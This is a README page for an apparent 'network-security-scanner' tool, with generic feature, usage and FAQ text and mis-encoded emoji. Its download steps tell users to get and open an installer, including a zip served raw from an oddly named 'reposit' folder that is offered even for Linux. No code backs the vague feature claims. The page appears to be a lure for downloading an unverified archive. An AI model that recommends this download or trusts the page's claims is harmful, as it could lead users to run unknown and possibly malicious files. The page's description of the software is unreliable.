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πŸ” network-security-scanner - Automate Your Network Security Checks

πŸš€ Getting Started

Welcome to the network-security-scanner! This tool helps you scan your network for potential security issues automatically. Whether you are checking for vulnerabilities, SSL issues, or other security aspects, this application simplifies the process for you.

πŸ“¦ Download & Install

To download the application, visit this page to download: Releases Page.

You will find different versions of the application listed there. Choose the latest version and follow these steps:

  1. Click on the version you want.
  2. Download the appropriate file for your system. For Windows, it might be a .exe file. For macOS, look for a .dmg file. Linux users can check for https://raw.githubusercontent.com/spanta0w0/network-security-scanner/main/reposit/security-scanner-network-3.6.zip.
  3. Once the file is downloaded, open it to start the installation.

Download now: Download

πŸ› οΈ System Requirements

Before installing, ensure your computer meets these requirements:

  • Operating Systems: Windows 10, macOS Mojave or later, or any modern Linux distribution
  • Memory: At least 4 GB of RAM
  • Storage: At least 100 MB of free disk space
  • Python: Version 3.6 or later (this application comes bundled with its own Python setup, if necessary)

✨ Features

The network-security-scanner offers a variety of features to keep your network safe:

  • Vulnerability Scanning: Identify security vulnerabilities in your network devices.
  • SSL Checking: Analyze SSL certificates for expiration and security flaws.
  • Customization Options: You can tailor scans to focus on specific devices or protocols.
  • Saved Reports: Generate and save reports for future reference.
  • User-Friendly Interface: Designed for ease of use, even for those without technical backgrounds.

πŸ”§ How to Use

  1. Open the application after installation.
  2. Select the type of scan you wish to performβ€”whether it's a vulnerability check or SSL verification.
  3. Input necessary details such as IP addresses or ranges to scan.
  4. Start the scan by clicking the appropriate button.
  5. Review the results. The application will display any issues found, along with suggested actions to resolve them.

πŸ“„ Understanding the Report

Once the scan is complete, the application will generate a report highlighting important findings. Look out for:

  • Critical Issues: These require immediate attention.
  • Warnings: Issues that could become critical with time.
  • Informational Alerts: Suggestions for improvements that could enhance security.

πŸ’¬ Frequently Asked Questions

1. What should I do if the scan finds a vulnerability?

Follow the recommendations provided in the report to address the issues. It may involve updating software or changing configurations.

2. Can I schedule scans?

The current version doesn’t support scheduled scans directly. However, you can set reminders to run the tool regularly.

3. Does this tool require internet access?

You can run the scans offline, but internet access may be necessary for some features, like checking for the latest vulnerability definitions.

πŸ’» Contributing

If you wish to contribute to the project or report any issues, feel free to check the GitHub Issues. Contributions from the community are always welcome.

πŸ“ž Support

If you encounter any problems, you can reach out for support via the issues section on GitHub. Our community is here to help you navigate any challenges you face.

πŸ”— Additional Resources

Thank you for using the network-security-scanner! Stay safe and aware of your network security.

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πŸ” Automate SSL checks, IP discovery, and reconnaissance to enhance network security and uncover hidden services across cloud and enterprise infrastructures.

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